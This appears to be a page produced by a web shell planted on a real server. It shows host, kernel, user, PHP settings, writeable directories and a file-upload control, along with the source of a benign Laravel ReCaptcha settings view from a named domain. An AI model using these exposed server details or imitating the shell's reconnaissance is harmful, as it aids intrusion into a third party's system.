KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.41 (Ubuntu)
System : Linux vmi1525618.contaboserver.net 5.4.0-105-generic #119-Ubuntu SMP Mon Mar 7 18:49:24 UTC 2022 x86_64
User : www-data ( 33)
PHP Version : 8.2.12
Disable Function : NONE
Directory :  /var/www/account.appointkrypt.com/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/account.appointkrypt.com/storage/framework/views/b4a37380a931309a5a7c0dbed1e7bb19.php
<div class="card" id="recaptcha-sidenav">
    <?php echo e(Form::open(['route' => 'recaptcha.setting.store', 'enctype' => 'multipart/form-data'])); ?>

    <?php echo csrf_field(); ?>
    <div class="card-header">
        <div class="row">
            <div class="col-lg-10 col-md-10 col-sm-10">
                <h5 class=""><?php echo e(__('ReCaptcha Settings')); ?></h5>
                <a href="https://phppot.com/php/how-to-get-google-recaptcha-site-and-secret-key/" target="_blank" class="text-blue">
                    <small><?php echo e(__('How to Get Google reCaptcha Site and Secret key')); ?></small>
                </a>
            </div>
            <div class="col-lg-2 col-md-2 col-sm-2 text-end">
                <div class="form-check form-switch custom-switch-v1 float-end">
                    <input type="checkbox" name="google_recaptcha_is_on" class="form-check-input input-primary" id="google_recaptcha_is_on"
                        <?php echo e((isset($settings['google_recaptcha_is_on']) && $settings['google_recaptcha_is_on'] == 'on') ? ' checked ' : ''); ?>>
                    <label class="form-check-label" for="google_recaptcha_is_on"></label>
                </div>
            </div>
        </div>
    </div>
    <div class="card-body">
        <div class="row mt-2">
            <div class="col-md-6">
                <div class="form-group">
                    <label for="google_recaptcha_key" class="form-label"><?php echo e(__('Google Recaptcha Key')); ?></label>
                    <input class="form-control google_recaptcha" required="required" placeholder="<?php echo e(__('Enter Google Recaptcha Key')); ?>" name="google_recaptcha_key"
                        type="text" value="<?php echo e(isset($settings['google_recaptcha_key']) ? $settings['google_recaptcha_key'] : ''); ?>"
                        <?php echo e((isset($settings['google_recaptcha_is_on']) && $settings['google_recaptcha_is_on'] == 'on') ? '' : ' disabled'); ?> id="google_recaptcha_key">
                </div>
            </div>
            <div class="col-md-6">
                <div class="form-group">
                    <label for="google_recaptcha_secret" class="form-label"><?php echo e(__('Google Recaptcha Secret')); ?></label>
                    <input class="form-control google_recaptcha" required="required" placeholder="<?php echo e(__('Enter Google Recaptcha Secret')); ?>"
                        name="google_recaptcha_secret" type="text" value="<?php echo e(isset($settings['google_recaptcha_secret']) ? $settings['google_recaptcha_secret'] : ''); ?>"
                        <?php echo e((isset($settings['google_recaptcha_is_on']) && $settings['google_recaptcha_is_on'] == 'on') ? '' : ' disabled'); ?> id="google_recaptcha_secret">
                </div>
            </div>
        </div>

    </div>
    <div class="card-footer text-end">
        <input class="btn btn-print-invoice  btn-primary m-r-10" type="submit" value="<?php echo e(__('Save Changes')); ?>">
    </div>
    <?php echo e(Form::close()); ?>

</div>
    <script>
        "use strict";
        $(document).on('click', '#google_recaptcha_is_on', function() {
            if ($('#google_recaptcha_is_on').prop('checked')) {
                $(".google_recaptcha").removeAttr("disabled");
            } else {
                $('.google_recaptcha').attr("disabled", "disabled");
            }
        });
    </script>
<?php /**PATH /var/www/account.appointkrypt.com/Modules/GoogleCaptcha/Resources/views/super-admin/settings/index.blade.php ENDPATH**/ ?>

Anon7 - 2021